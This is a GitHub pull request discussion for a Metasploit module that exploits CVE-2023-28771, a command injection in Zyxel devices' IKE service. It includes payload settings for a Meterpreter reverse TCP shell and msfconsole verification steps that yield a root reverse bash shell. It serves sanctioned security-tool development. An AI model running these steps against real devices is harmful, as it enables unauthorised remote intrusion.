CVE-2023-28771 - Zyxel Command Injection #18016
Conversation
Amazing work!
Thanks for the awesome module @sfewer-r7! Would you be able to include a pcap of the module running / exploiting the physical device? This would really help whoever ends up reviewing and landing this, cheers.
Thanks @jheysel-r7, attached is a PCAP for the following session:

```ruby
'DefaultOptions' => {
  'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
}
}
```
This should be able to be replaced with the new fetch payloads, however right now it's infeasible because we don't have a MIPS64 adapter. I'll see about adding one and then we can rebase this once that's done to include it.
This is cursed, but the Python Meterpreter payload might work here. I've been toying around with the exploit a little, and something like the following (Python) works... I've been playing with ever more lengthy python reverse shells/whatnot, but there is no reason a Python Meterpreter won't work.
…ved the separate command and dropper targets in favor of a single default target which can do both thanks to fetch payloads. Removed the redundant IO select() call which was bad copy pasta on my part.
Hi @zeroSteiner I have rebased this pull request and reworked the module to support the fetch payloads. Tested and works great with a I have attached a PCAP cve_2023_28771.fetch.pcapng.zip of that working.
Release Notes
This adds an exploit for CVE-2023-28771 which is a remote, unauthenticated OS command injection in the IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the
This module exploits CVE-2023-28771, a remote unauthenticated command injection vulnerability in the Internet Key Exchange (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. For a full technical analysis of the vulnerability read the Rapid7 AttackerKB Analysis.
Testing
A physical device is required for testing. The device must be running a vulnerable firmware version prior to the vendor patch. A Zyxel USG FLEX 100 device was used during development and testing of this Metasploit module.
The attacker must be able to send UDP data to port 500 on the WAN interface of the affected network device.
Verification Steps
```
use exploit/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771
set RHOST <TARGET_WAN_IP>
set LHOST eth0
check
exploit
```

The default payload for target 0 is a cmd/unix/reverse_bash payload. A root command shell session should be created.